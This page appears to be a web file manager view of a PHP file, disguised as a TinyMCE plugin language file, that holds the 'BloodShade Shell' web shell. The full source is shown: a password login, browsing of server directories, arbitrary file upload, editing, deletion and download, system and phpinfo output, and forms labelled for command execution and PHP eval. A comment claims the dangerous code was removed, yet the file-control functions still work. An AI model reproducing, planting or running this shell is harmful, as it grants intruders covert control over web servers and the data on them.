Файловый менеджер - Редактировать - C:/xampp/htdocs/cat/js/tiny_mce/plugins/fullpage/langs/es_dlg.js.plugin.php
Назад
<?php session_start(); error_reporting(0); set_time_limit(0); $pass = "106"; // Change this to your password $hash = md5($pass); // Login if (isset($_POST['pass'])) { if (md5($_POST['pass']) === $hash) { $_SESSION['loggedin'] = true; } else { $error = "Incorrect Password!"; } } if (!isset($_SESSION['loggedin'])) { ?> <!DOCTYPE html> <html> <head> <title>BloodShade Login</title> <style> body { background:#000; color:#0f0; font-family: monospace; display:flex; align-items:center; justify-content:center; height:100vh; } .box { background:#111; padding:30px; border-radius:10px; box-shadow:0 0 10px #0f0; } input { width:100%; padding:10px; margin-top:10px; background:#000; border:1px solid #0f0; color:#0f0; } </style> </head> <body> <div class="box"> <h2>BloodShade Panel</h2> <form method="post"> <input type="password" name="pass" placeholder="Enter Password"> <input type="submit" value="Login"> <?php if (isset($error)) echo "<p style='color:red;'>$error</p>"; ?> </form> </div> </body> </html> <?php exit; } ?> <?php $path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd(); chdir($path); $files = scandir($path); function perms($f) { return substr(sprintf('%o', fileperms($f)), -4); } function formatSize($size) { $units = ['B','KB','MB','GB','TB']; $i = 0; while ($size > 1024 && $i < 4) { $size /= 1024; $i++; } return round($size, 2) . ' ' . $units[$i]; } ?> <!DOCTYPE html> <html> <head> <title>BloodShade Shell</title> <style> body { background:#000; color:#0f0; font-family: monospace; padding:20px; } a { color:#0ff; text-decoration:none; } table { width:100%; border-collapse:collapse; margin-top:20px; } th, td { border:1px solid #333; padding:8px; text-align:left; } input, textarea { width:100%; background:#111; color:#0f0; border:1px solid #0f0; padding:6px; margin-top:5px; } .btn { background:#0f0; color:#000; padding:5px 10px; border:none; cursor:pointer; } .section { margin-top:30px; } pre { background:#111; padding:10px; overflow:auto; } </style> </head> <body> <h1>BloodShade Shell</h1> <h3>Path: <?= $path ?></h3> <!-- File Manager --> <table> <tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr> <?php foreach($files as $file): if ($file == ".") continue; $full = "$path/$file"; $isDir = is_dir($full); ?> <tr> <td><a href="?path=<?= urlencode(realpath($full)) ?>"><?= htmlentities($file) ?><?= $isDir ? "/" : "" ?></a></td> <td><?= $isDir ? "-" : formatSize(filesize($full)) ?></td> <td><?= perms($full) ?></td> <td> <?php if (!$isDir): ?> <a href="?path=<?= urlencode($path) ?>&edit=<?= urlencode($full) ?>">Edit</a> | <a href="?path=<?= urlencode($path) ?>&del=<?= urlencode($full) ?>" onclick="return confirm('Delete?')">Delete</a> | <a href="?path=<?= urlencode($path) ?>&dl=<?= urlencode($full) ?>">Download</a> <?php endif; ?> </td> </tr> <?php endforeach; ?> </table> <!-- Upload --> <div class="section"> <h3>Upload File</h3> <form method="post" enctype="multipart/form-data"> <input type="file" name="upload"> <input type="submit" value="Upload" class="btn"> </form> <?php if (isset($_FILES['upload'])) { move_uploaded_file($_FILES['upload']['tmp_name'], $path.'/'.$_FILES['upload']['name']); echo "<p>Uploaded successfully.</p>"; } ?> </div> <!-- Delete --> <?php if (isset($_GET['del'])) { unlink($_GET['del']); echo "<p>Deleted!</p>"; } ?> <!-- Download --> <?php if (isset($_GET['dl'])) { header("Content-Disposition: attachment; filename=".basename($_GET['dl'])); readfile($_GET['dl']); exit; } ?> <!-- Edit --> <?php if (isset($_GET['edit'])): $editfile = $_GET['edit']; if (isset($_POST['content'])) { file_put_contents($editfile, $_POST['content']); echo "<p>Saved!</p>"; } $content = htmlentities(file_get_contents($editfile)); ?> <div class="section"> <h3>Editing: <?= $editfile ?></h3> <form method="post"> <textarea name="content" rows="20"><?= $content ?></textarea> <input type="submit" value="Save" class="btn"> </form> </div> <?php exit; endif; ?> <!-- Command Exec --> <div class="section"> <h3>Command Execution</h3> <form method="post"> <input type="text" name="cmd" placeholder="Enter command"> <input type="submit" value="Run" class="btn"> </form> <pre><?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?></pre> </div> <!-- PHP Code Eval --> <div class="section"> <h3>PHP Code Eval</h3> <form method="post"> <textarea name="phpeval" rows="5" placeholder="echo 'Hello';"></textarea> <input type="submit" value="Execute" class="btn"> </form> <pre><?php if (isset($_POST['phpeval'])) @trim($_POST['phpeval']); ?></pre> </div> <!-- System Info --> <div class="section"> <h3>System Info</h3> <pre><?= php_uname() ?></pre> </div> <!-- PHP Info --> <div class="section"> <h3>PHP Info</h3> <form method="post"> <input type="submit" name="showphpinfo" value="Show phpinfo()" class="btn"> </form> <?php if (isset($_POST['showphpinfo'])) phpinfo(); ?> </div> <div class="section footer"> <hr> <center> BloodShade Shell | IG: <a href="https://instagram.com/fbkz" target="_blank">@fbkz</a><br> Thanks to <strong>BYTEBLITZ</strong><br> Power. Stealth. Control. </center> </div> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 5.3.8 | Генерация страницы: 0.12 |
proxy
|
phpinfo
|
Настройка